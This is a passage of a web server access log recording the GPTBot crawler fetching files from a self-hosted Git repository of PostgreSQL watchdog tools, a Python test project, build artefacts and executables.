"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:13:54:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" +[17/Feb/2026:13:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 11623] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:13:54:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 11429] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" +[17/Feb/2026:13:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 9912] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:13:54:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17379] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:54:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10423] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:54:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 45869] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42724] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:54:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 9903] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" +[17/Feb/2026:13:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:54:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 17003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:13:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 895] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" +[17/Feb/2026:13:54:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 7] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" +[17/Feb/2026:13:54:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" [Client 74.7.227.38] [Length 9907] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" +[17/Feb/2026:13:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" [Client 74.7.227.38] [Length 35046] [Gzip 15.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.py" +[17/Feb/2026:13:54:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" +[17/Feb/2026:13:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" [Client 74.7.227.38] [Length 764] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:13:54:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 3799] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 15943] [Gzip 8.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:54:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" [Client 74.7.227.38] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/main.cpp" +[17/Feb/2026:13:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" +[17/Feb/2026:13:54:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 22472] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" +[17/Feb/2026:13:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/README.md" +[17/Feb/2026:13:54:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" +[17/Feb/2026:13:54:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" +[17/Feb/2026:13:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt?display=rendered" [Client 74.7.227.38] [Length 10924] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/env.example.txt" +[17/Feb/2026:13:54:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17349] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:13:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest" +[17/Feb/2026:13:54:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 12292] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" +[17/Feb/2026:13:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 4329948] [Gzip 20.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:13:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 10877] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" +[17/Feb/2026:13:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" [Client 74.7.227.38] [Length 2464009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libstdc++-6.dll" +[17/Feb/2026:13:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 10883] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist" +[17/Feb/2026:13:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9904] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:13:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9487] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:13:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10958571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:13:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 11471] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:13:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" +[17/Feb/2026:13:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 23045] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 11904] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/Gitea_Manual.md" +[17/Feb/2026:13:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" +[17/Feb/2026:13:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 14351] [Gzip 27.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" +[17/Feb/2026:13:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/my_database.db" +[17/Feb/2026:13:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/PostgresPatrol-Debug.spec" [Client 74.7.227.38] [Length 709] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 